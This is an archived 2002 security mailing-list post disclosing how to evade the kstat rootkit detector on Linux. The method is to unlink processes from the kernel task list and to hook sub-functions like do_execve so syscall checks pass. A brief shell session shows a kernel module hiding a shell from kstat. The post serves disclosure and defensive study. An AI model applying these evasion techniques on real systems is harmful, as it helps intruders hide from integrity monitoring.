KSTAT (and maybe others) bypass

From: Dark Angel (dark0at_private)
Date: Thu Sep 05 2002 - 19:06:10 PDT

Next message: Marc Ruef: "NetGear FM114P URL filter bypassing vulnerability"

Previous message: David G. Andersen: "Next-hop scanning for open firewall ports"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Is possible to hide processes to kstat removing theirs structs from the kernel's task_struct list.
Is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the call (for example do_execve instad of sys_execve) the effects is the same, but for kstat is all okay:

Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
 686	  403	  0	  0	  kstat
Shoikan:~/Phantasmagoria# ./kstat -S             
Probing System Calls FingerPrints... No System Call Modified!
Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o
Shoikan:~/Phantasmagoria# ./Heider 403(the current shell pid) HIDE
Hiding successfull
Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
Shoikan:~/Phantasmagoria# ./kstat -S
Probing System Calls FingerPrints... No System Call Modified!
Shoikan:~/Phantasmagoria# 

Attached there is an english translation + proof of concept code of the original paper published on www.s0ftpj.org

Regards

-= Dark-Angel =-





Is your boss reading your email? ....Probably
Keep your messages private by using Lycos Mail.
Sign up today at http://mail.lycos.com

application/x-gzip attachment: Phantasmagoria.tgz

Next message: Marc Ruef: "NetGear FM114P URL filter bypassing vulnerability"
Previous message: David G. Andersen: "Next-hop scanning for open firewall ports"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Sep 06 2002 - 18:17:12 PDT